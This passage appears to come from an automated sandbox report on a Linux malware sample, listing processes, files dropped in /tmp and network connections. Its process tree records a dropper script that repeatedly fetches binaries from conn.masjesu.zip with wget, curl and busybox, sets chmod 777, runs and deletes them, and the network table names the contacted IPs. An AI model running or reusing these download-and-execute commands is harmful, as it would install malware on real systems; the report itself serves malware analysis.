| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
Writes file to tmp directory
| Description | Indicator | Process | Target |
| File opened for modification | /tmp/pebU8NLJ2QZm3ljGLG6AjiGvKW3L2zgyFr | /usr/bin/curl | N/A |
| File opened for modification | /tmp/5l4Jhg0nKpedT0d1oZFp9RyhuMSRMFcxMI | /usr/bin/curl | N/A |
| File opened for modification | /tmp/2ztLXeAOigeOY44ahCLMb1hoCslqoEooJD | /usr/bin/curl | N/A |
| File opened for modification | /tmp/b2FGs95mFuYYXDBu3HpTy2fY1Q27asFU3n | /usr/bin/curl | N/A |
| File opened for modification | /tmp/2ztLXeAOigeOY44ahCLMb1hoCslqoEooJD | /usr/bin/curl | N/A |
| File opened for modification | /tmp/sXmLfTQZLQDyxKa1AvY2uJa7K73tGoe4xd | /usr/bin/curl | N/A |
| File opened for modification | /tmp/tgsOhUvjmRjf2CBhhW9EMnEYAjeucOOmgH | /usr/bin/curl | N/A |
| File opened for modification | /tmp/rCUQoU8oBiCcEg5qTgbyNfHBsEtY11Y9aK | /usr/bin/curl | N/A |
| File opened for modification | /tmp/ezk2IT2dVBwQgBhEHIMVRyOqkUIiZ2m5Ll | /usr/bin/curl | N/A |
| File opened for modification | /tmp/R6JtIiTg7Cg2azn4w4oDKBJyrgATUVyfij | /usr/bin/curl | N/A |
| File opened for modification | /tmp/ezk2IT2dVBwQgBhEHIMVRyOqkUIiZ2m5Ll | /usr/bin/curl | N/A |
| File opened for modification | /tmp/b2FGs95mFuYYXDBu3HpTy2fY1Q27asFU3n | /usr/bin/curl | N/A |
| File opened for modification | /tmp/rA8TxQwqLmHMgt5WJOMQMZZPYO6SeeSdMR | /usr/bin/curl | N/A |
| File opened for modification | /tmp/pebU8NLJ2QZm3ljGLG6AjiGvKW3L2zgyFr | /usr/bin/curl | N/A |
| File opened for modification | /tmp/rCUQoU8oBiCcEg5qTgbyNfHBsEtY11Y9aK | /usr/bin/curl | N/A |
| File opened for modification | /tmp/5l4Jhg0nKpedT0d1oZFp9RyhuMSRMFcxMI | /usr/bin/curl | N/A |
| File opened for modification | /tmp/sXmLfTQZLQDyxKa1AvY2uJa7K73tGoe4xd | /usr/bin/curl | N/A |
| File opened for modification | /tmp/R6JtIiTg7Cg2azn4w4oDKBJyrgATUVyfij | /usr/bin/curl | N/A |
| File opened for modification | /tmp/7cLNA9H2S3BsuPg5j9PCz1w9Zbrt411uGv | /usr/bin/curl | N/A |
| File opened for modification | /tmp/2OUJ87yUwEMH5vkZLgZ32qHjjMx6jaP2Hb | /usr/bin/curl | N/A |
| File opened for modification | /tmp/rA8TxQwqLmHMgt5WJOMQMZZPYO6SeeSdMR | /usr/bin/curl | N/A |
| File opened for modification | /tmp/7cLNA9H2S3BsuPg5j9PCz1w9Zbrt411uGv | /usr/bin/curl | N/A |
| File opened for modification | /tmp/tgsOhUvjmRjf2CBhhW9EMnEYAjeucOOmgH | /usr/bin/curl | N/A |
| File opened for modification | /tmp/2OUJ87yUwEMH5vkZLgZ32qHjjMx6jaP2Hb | /usr/bin/curl | N/A |
| File opened for modification | /tmp/e81v4mmB0VXqxAsOG7uQt0J83UpiLoyjVN | /usr/bin/curl | N/A |
| File opened for modification | /tmp/FHbdJp4ofFQE563YPPEO84Mlg55XHua9K4 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/FHbdJp4ofFQE563YPPEO84Mlg55XHua9K4 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/e81v4mmB0VXqxAsOG7uQt0J83UpiLoyjVN | /usr/bin/curl | N/A |
Processes
/tmp/7f7be811d6a27231800a221f543dc515b9be0376f463c35edbe971f9fd1baa3e.sh
[/tmp/7f7be811d6a27231800a221f543dc515b9be0376f463c35edbe971f9fd1baa3e.sh]
/bin/rm
[/bin/rm bins.sh]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/b2FGs95mFuYYXDBu3HpTy2fY1Q27asFU3n]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/b2FGs95mFuYYXDBu3HpTy2fY1Q27asFU3n]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/b2FGs95mFuYYXDBu3HpTy2fY1Q27asFU3n]
/bin/chmod
[chmod 777 b2FGs95mFuYYXDBu3HpTy2fY1Q27asFU3n]
/tmp/b2FGs95mFuYYXDBu3HpTy2fY1Q27asFU3n
[./b2FGs95mFuYYXDBu3HpTy2fY1Q27asFU3n]
/bin/rm
[rm b2FGs95mFuYYXDBu3HpTy2fY1Q27asFU3n]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/pebU8NLJ2QZm3ljGLG6AjiGvKW3L2zgyFr]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/pebU8NLJ2QZm3ljGLG6AjiGvKW3L2zgyFr]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/pebU8NLJ2QZm3ljGLG6AjiGvKW3L2zgyFr]
/bin/chmod
[chmod 777 pebU8NLJ2QZm3ljGLG6AjiGvKW3L2zgyFr]
/tmp/pebU8NLJ2QZm3ljGLG6AjiGvKW3L2zgyFr
[./pebU8NLJ2QZm3ljGLG6AjiGvKW3L2zgyFr]
/bin/rm
[rm pebU8NLJ2QZm3ljGLG6AjiGvKW3L2zgyFr]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/R6JtIiTg7Cg2azn4w4oDKBJyrgATUVyfij]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/R6JtIiTg7Cg2azn4w4oDKBJyrgATUVyfij]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/R6JtIiTg7Cg2azn4w4oDKBJyrgATUVyfij]
/bin/chmod
[chmod 777 R6JtIiTg7Cg2azn4w4oDKBJyrgATUVyfij]
/tmp/R6JtIiTg7Cg2azn4w4oDKBJyrgATUVyfij
[./R6JtIiTg7Cg2azn4w4oDKBJyrgATUVyfij]
/bin/rm
[rm R6JtIiTg7Cg2azn4w4oDKBJyrgATUVyfij]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/rA8TxQwqLmHMgt5WJOMQMZZPYO6SeeSdMR]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/rA8TxQwqLmHMgt5WJOMQMZZPYO6SeeSdMR]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/rA8TxQwqLmHMgt5WJOMQMZZPYO6SeeSdMR]
/bin/chmod
[chmod 777 rA8TxQwqLmHMgt5WJOMQMZZPYO6SeeSdMR]
/tmp/rA8TxQwqLmHMgt5WJOMQMZZPYO6SeeSdMR
[./rA8TxQwqLmHMgt5WJOMQMZZPYO6SeeSdMR]
/bin/rm
[rm rA8TxQwqLmHMgt5WJOMQMZZPYO6SeeSdMR]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/rCUQoU8oBiCcEg5qTgbyNfHBsEtY11Y9aK]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/rCUQoU8oBiCcEg5qTgbyNfHBsEtY11Y9aK]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/rCUQoU8oBiCcEg5qTgbyNfHBsEtY11Y9aK]
/bin/chmod
[chmod 777 rCUQoU8oBiCcEg5qTgbyNfHBsEtY11Y9aK]
/tmp/rCUQoU8oBiCcEg5qTgbyNfHBsEtY11Y9aK
[./rCUQoU8oBiCcEg5qTgbyNfHBsEtY11Y9aK]
/bin/rm
[rm rCUQoU8oBiCcEg5qTgbyNfHBsEtY11Y9aK]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/ezk2IT2dVBwQgBhEHIMVRyOqkUIiZ2m5Ll]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/ezk2IT2dVBwQgBhEHIMVRyOqkUIiZ2m5Ll]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/ezk2IT2dVBwQgBhEHIMVRyOqkUIiZ2m5Ll]
/bin/chmod
[chmod 777 ezk2IT2dVBwQgBhEHIMVRyOqkUIiZ2m5Ll]
/tmp/ezk2IT2dVBwQgBhEHIMVRyOqkUIiZ2m5Ll
[./ezk2IT2dVBwQgBhEHIMVRyOqkUIiZ2m5Ll]
/bin/rm
[rm ezk2IT2dVBwQgBhEHIMVRyOqkUIiZ2m5Ll]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/2ztLXeAOigeOY44ahCLMb1hoCslqoEooJD]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/2ztLXeAOigeOY44ahCLMb1hoCslqoEooJD]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/2ztLXeAOigeOY44ahCLMb1hoCslqoEooJD]
/bin/chmod
[chmod 777 2ztLXeAOigeOY44ahCLMb1hoCslqoEooJD]
/tmp/2ztLXeAOigeOY44ahCLMb1hoCslqoEooJD
[./2ztLXeAOigeOY44ahCLMb1hoCslqoEooJD]
/bin/rm
[rm 2ztLXeAOigeOY44ahCLMb1hoCslqoEooJD]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/sXmLfTQZLQDyxKa1AvY2uJa7K73tGoe4xd]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/sXmLfTQZLQDyxKa1AvY2uJa7K73tGoe4xd]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/sXmLfTQZLQDyxKa1AvY2uJa7K73tGoe4xd]
/bin/chmod
[chmod 777 sXmLfTQZLQDyxKa1AvY2uJa7K73tGoe4xd]
/tmp/sXmLfTQZLQDyxKa1AvY2uJa7K73tGoe4xd
[./sXmLfTQZLQDyxKa1AvY2uJa7K73tGoe4xd]
/bin/rm
[rm sXmLfTQZLQDyxKa1AvY2uJa7K73tGoe4xd]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/7cLNA9H2S3BsuPg5j9PCz1w9Zbrt411uGv]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/7cLNA9H2S3BsuPg5j9PCz1w9Zbrt411uGv]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/7cLNA9H2S3BsuPg5j9PCz1w9Zbrt411uGv]
/bin/chmod
[chmod 777 7cLNA9H2S3BsuPg5j9PCz1w9Zbrt411uGv]
/tmp/7cLNA9H2S3BsuPg5j9PCz1w9Zbrt411uGv
[./7cLNA9H2S3BsuPg5j9PCz1w9Zbrt411uGv]
/bin/rm
[rm 7cLNA9H2S3BsuPg5j9PCz1w9Zbrt411uGv]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/5l4Jhg0nKpedT0d1oZFp9RyhuMSRMFcxMI]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/5l4Jhg0nKpedT0d1oZFp9RyhuMSRMFcxMI]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/5l4Jhg0nKpedT0d1oZFp9RyhuMSRMFcxMI]
/bin/chmod
[chmod 777 5l4Jhg0nKpedT0d1oZFp9RyhuMSRMFcxMI]
/tmp/5l4Jhg0nKpedT0d1oZFp9RyhuMSRMFcxMI
[./5l4Jhg0nKpedT0d1oZFp9RyhuMSRMFcxMI]
/bin/rm
[rm 5l4Jhg0nKpedT0d1oZFp9RyhuMSRMFcxMI]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/FHbdJp4ofFQE563YPPEO84Mlg55XHua9K4]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/FHbdJp4ofFQE563YPPEO84Mlg55XHua9K4]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/FHbdJp4ofFQE563YPPEO84Mlg55XHua9K4]
/bin/chmod
[chmod 777 FHbdJp4ofFQE563YPPEO84Mlg55XHua9K4]
/tmp/FHbdJp4ofFQE563YPPEO84Mlg55XHua9K4
[./FHbdJp4ofFQE563YPPEO84Mlg55XHua9K4]
/bin/rm
[rm FHbdJp4ofFQE563YPPEO84Mlg55XHua9K4]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/tgsOhUvjmRjf2CBhhW9EMnEYAjeucOOmgH]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/tgsOhUvjmRjf2CBhhW9EMnEYAjeucOOmgH]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/tgsOhUvjmRjf2CBhhW9EMnEYAjeucOOmgH]
/bin/chmod
[chmod 777 tgsOhUvjmRjf2CBhhW9EMnEYAjeucOOmgH]
/tmp/tgsOhUvjmRjf2CBhhW9EMnEYAjeucOOmgH
[./tgsOhUvjmRjf2CBhhW9EMnEYAjeucOOmgH]
/bin/rm
[rm tgsOhUvjmRjf2CBhhW9EMnEYAjeucOOmgH]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/2OUJ87yUwEMH5vkZLgZ32qHjjMx6jaP2Hb]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/2OUJ87yUwEMH5vkZLgZ32qHjjMx6jaP2Hb]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/2OUJ87yUwEMH5vkZLgZ32qHjjMx6jaP2Hb]
/bin/chmod
[chmod 777 2OUJ87yUwEMH5vkZLgZ32qHjjMx6jaP2Hb]
/tmp/2OUJ87yUwEMH5vkZLgZ32qHjjMx6jaP2Hb
[./2OUJ87yUwEMH5vkZLgZ32qHjjMx6jaP2Hb]
/bin/rm
[rm 2OUJ87yUwEMH5vkZLgZ32qHjjMx6jaP2Hb]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/e81v4mmB0VXqxAsOG7uQt0J83UpiLoyjVN]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/e81v4mmB0VXqxAsOG7uQt0J83UpiLoyjVN]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/e81v4mmB0VXqxAsOG7uQt0J83UpiLoyjVN]
/bin/chmod
[chmod 777 e81v4mmB0VXqxAsOG7uQt0J83UpiLoyjVN]
/tmp/e81v4mmB0VXqxAsOG7uQt0J83UpiLoyjVN
[./e81v4mmB0VXqxAsOG7uQt0J83UpiLoyjVN]
/bin/rm
[rm e81v4mmB0VXqxAsOG7uQt0J83UpiLoyjVN]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/2OUJ87yUwEMH5vkZLgZ32qHjjMx6jaP2Hb]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/2OUJ87yUwEMH5vkZLgZ32qHjjMx6jaP2Hb]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/2OUJ87yUwEMH5vkZLgZ32qHjjMx6jaP2Hb]
/bin/chmod
[chmod 777 2OUJ87yUwEMH5vkZLgZ32qHjjMx6jaP2Hb]
/tmp/2OUJ87yUwEMH5vkZLgZ32qHjjMx6jaP2Hb
[./2OUJ87yUwEMH5vkZLgZ32qHjjMx6jaP2Hb]
/bin/rm
[rm 2OUJ87yUwEMH5vkZLgZ32qHjjMx6jaP2Hb]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/e81v4mmB0VXqxAsOG7uQt0J83UpiLoyjVN]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/e81v4mmB0VXqxAsOG7uQt0J83UpiLoyjVN]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/e81v4mmB0VXqxAsOG7uQt0J83UpiLoyjVN]
/bin/chmod
[chmod 777 e81v4mmB0VXqxAsOG7uQt0J83UpiLoyjVN]
/tmp/e81v4mmB0VXqxAsOG7uQt0J83UpiLoyjVN
[./e81v4mmB0VXqxAsOG7uQt0J83UpiLoyjVN]
/bin/rm
[rm e81v4mmB0VXqxAsOG7uQt0J83UpiLoyjVN]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/b2FGs95mFuYYXDBu3HpTy2fY1Q27asFU3n]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/b2FGs95mFuYYXDBu3HpTy2fY1Q27asFU3n]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/b2FGs95mFuYYXDBu3HpTy2fY1Q27asFU3n]
/bin/chmod
[chmod 777 b2FGs95mFuYYXDBu3HpTy2fY1Q27asFU3n]
/tmp/b2FGs95mFuYYXDBu3HpTy2fY1Q27asFU3n
[./b2FGs95mFuYYXDBu3HpTy2fY1Q27asFU3n]
/bin/rm
[rm b2FGs95mFuYYXDBu3HpTy2fY1Q27asFU3n]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/pebU8NLJ2QZm3ljGLG6AjiGvKW3L2zgyFr]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/pebU8NLJ2QZm3ljGLG6AjiGvKW3L2zgyFr]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/pebU8NLJ2QZm3ljGLG6AjiGvKW3L2zgyFr]
/bin/chmod
[chmod 777 pebU8NLJ2QZm3ljGLG6AjiGvKW3L2zgyFr]
/tmp/pebU8NLJ2QZm3ljGLG6AjiGvKW3L2zgyFr
[./pebU8NLJ2QZm3ljGLG6AjiGvKW3L2zgyFr]
/bin/rm
[rm pebU8NLJ2QZm3ljGLG6AjiGvKW3L2zgyFr]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/R6JtIiTg7Cg2azn4w4oDKBJyrgATUVyfij]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/R6JtIiTg7Cg2azn4w4oDKBJyrgATUVyfij]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/R6JtIiTg7Cg2azn4w4oDKBJyrgATUVyfij]
/bin/chmod
[chmod 777 R6JtIiTg7Cg2azn4w4oDKBJyrgATUVyfij]
/tmp/R6JtIiTg7Cg2azn4w4oDKBJyrgATUVyfij
[./R6JtIiTg7Cg2azn4w4oDKBJyrgATUVyfij]
/bin/rm
[rm R6JtIiTg7Cg2azn4w4oDKBJyrgATUVyfij]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/rA8TxQwqLmHMgt5WJOMQMZZPYO6SeeSdMR]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/rA8TxQwqLmHMgt5WJOMQMZZPYO6SeeSdMR]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/rA8TxQwqLmHMgt5WJOMQMZZPYO6SeeSdMR]
/bin/chmod
[chmod 777 rA8TxQwqLmHMgt5WJOMQMZZPYO6SeeSdMR]
/tmp/rA8TxQwqLmHMgt5WJOMQMZZPYO6SeeSdMR
[./rA8TxQwqLmHMgt5WJOMQMZZPYO6SeeSdMR]
/bin/rm
[rm rA8TxQwqLmHMgt5WJOMQMZZPYO6SeeSdMR]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/rCUQoU8oBiCcEg5qTgbyNfHBsEtY11Y9aK]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/rCUQoU8oBiCcEg5qTgbyNfHBsEtY11Y9aK]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/rCUQoU8oBiCcEg5qTgbyNfHBsEtY11Y9aK]
/bin/chmod
[chmod 777 rCUQoU8oBiCcEg5qTgbyNfHBsEtY11Y9aK]
/tmp/rCUQoU8oBiCcEg5qTgbyNfHBsEtY11Y9aK
[./rCUQoU8oBiCcEg5qTgbyNfHBsEtY11Y9aK]
/bin/rm
[rm rCUQoU8oBiCcEg5qTgbyNfHBsEtY11Y9aK]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/ezk2IT2dVBwQgBhEHIMVRyOqkUIiZ2m5Ll]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/ezk2IT2dVBwQgBhEHIMVRyOqkUIiZ2m5Ll]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/ezk2IT2dVBwQgBhEHIMVRyOqkUIiZ2m5Ll]
/bin/chmod
[chmod 777 ezk2IT2dVBwQgBhEHIMVRyOqkUIiZ2m5Ll]
/tmp/ezk2IT2dVBwQgBhEHIMVRyOqkUIiZ2m5Ll
[./ezk2IT2dVBwQgBhEHIMVRyOqkUIiZ2m5Ll]
/bin/rm
[rm ezk2IT2dVBwQgBhEHIMVRyOqkUIiZ2m5Ll]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/7cLNA9H2S3BsuPg5j9PCz1w9Zbrt411uGv]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/7cLNA9H2S3BsuPg5j9PCz1w9Zbrt411uGv]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/7cLNA9H2S3BsuPg5j9PCz1w9Zbrt411uGv]
/bin/chmod
[chmod 777 7cLNA9H2S3BsuPg5j9PCz1w9Zbrt411uGv]
/tmp/7cLNA9H2S3BsuPg5j9PCz1w9Zbrt411uGv
[./7cLNA9H2S3BsuPg5j9PCz1w9Zbrt411uGv]
/bin/rm
[rm 7cLNA9H2S3BsuPg5j9PCz1w9Zbrt411uGv]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/5l4Jhg0nKpedT0d1oZFp9RyhuMSRMFcxMI]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/5l4Jhg0nKpedT0d1oZFp9RyhuMSRMFcxMI]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/5l4Jhg0nKpedT0d1oZFp9RyhuMSRMFcxMI]
/bin/chmod
[chmod 777 5l4Jhg0nKpedT0d1oZFp9RyhuMSRMFcxMI]
/tmp/5l4Jhg0nKpedT0d1oZFp9RyhuMSRMFcxMI
[./5l4Jhg0nKpedT0d1oZFp9RyhuMSRMFcxMI]
/bin/rm
[rm 5l4Jhg0nKpedT0d1oZFp9RyhuMSRMFcxMI]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/FHbdJp4ofFQE563YPPEO84Mlg55XHua9K4]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/FHbdJp4ofFQE563YPPEO84Mlg55XHua9K4]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/FHbdJp4ofFQE563YPPEO84Mlg55XHua9K4]
/bin/chmod
[chmod 777 FHbdJp4ofFQE563YPPEO84Mlg55XHua9K4]
/tmp/FHbdJp4ofFQE563YPPEO84Mlg55XHua9K4
[./FHbdJp4ofFQE563YPPEO84Mlg55XHua9K4]
/bin/rm
[rm FHbdJp4ofFQE563YPPEO84Mlg55XHua9K4]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/tgsOhUvjmRjf2CBhhW9EMnEYAjeucOOmgH]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/tgsOhUvjmRjf2CBhhW9EMnEYAjeucOOmgH]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/tgsOhUvjmRjf2CBhhW9EMnEYAjeucOOmgH]
/bin/chmod
[chmod 777 tgsOhUvjmRjf2CBhhW9EMnEYAjeucOOmgH]
/tmp/tgsOhUvjmRjf2CBhhW9EMnEYAjeucOOmgH
[./tgsOhUvjmRjf2CBhhW9EMnEYAjeucOOmgH]
/bin/rm
[rm tgsOhUvjmRjf2CBhhW9EMnEYAjeucOOmgH]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/2ztLXeAOigeOY44ahCLMb1hoCslqoEooJD]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/2ztLXeAOigeOY44ahCLMb1hoCslqoEooJD]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/2ztLXeAOigeOY44ahCLMb1hoCslqoEooJD]
/bin/chmod
[chmod 777 2ztLXeAOigeOY44ahCLMb1hoCslqoEooJD]
/tmp/2ztLXeAOigeOY44ahCLMb1hoCslqoEooJD
[./2ztLXeAOigeOY44ahCLMb1hoCslqoEooJD]
/bin/rm
[rm 2ztLXeAOigeOY44ahCLMb1hoCslqoEooJD]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/sXmLfTQZLQDyxKa1AvY2uJa7K73tGoe4xd]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/sXmLfTQZLQDyxKa1AvY2uJa7K73tGoe4xd]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/sXmLfTQZLQDyxKa1AvY2uJa7K73tGoe4xd]
/bin/chmod
[chmod 777 sXmLfTQZLQDyxKa1AvY2uJa7K73tGoe4xd]
/tmp/sXmLfTQZLQDyxKa1AvY2uJa7K73tGoe4xd
[./sXmLfTQZLQDyxKa1AvY2uJa7K73tGoe4xd]
/bin/rm
[rm sXmLfTQZLQDyxKa1AvY2uJa7K73tGoe4xd]
Network
| Country | Destination | Domain | Proto |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 216.126.231.240:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 216.126.231.240:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.125.191:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 216.126.231.240:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.125.191:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 216.126.231.240:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.125.191:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 216.126.231.240:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.125.191:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 216.126.231.240:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.125.191:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 216.126.231.240:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.125.191:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 216.126.231.240:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.125.191:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 216.126.231.240:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.125.191:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.125.191:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 216.126.231.240:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 216.126.231.240:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 216.126.231.240:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.125.191:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 216.126.231.240:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 216.126.231.240:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 216.126.231.240:80 | conn.masjesu.zip | tcp |
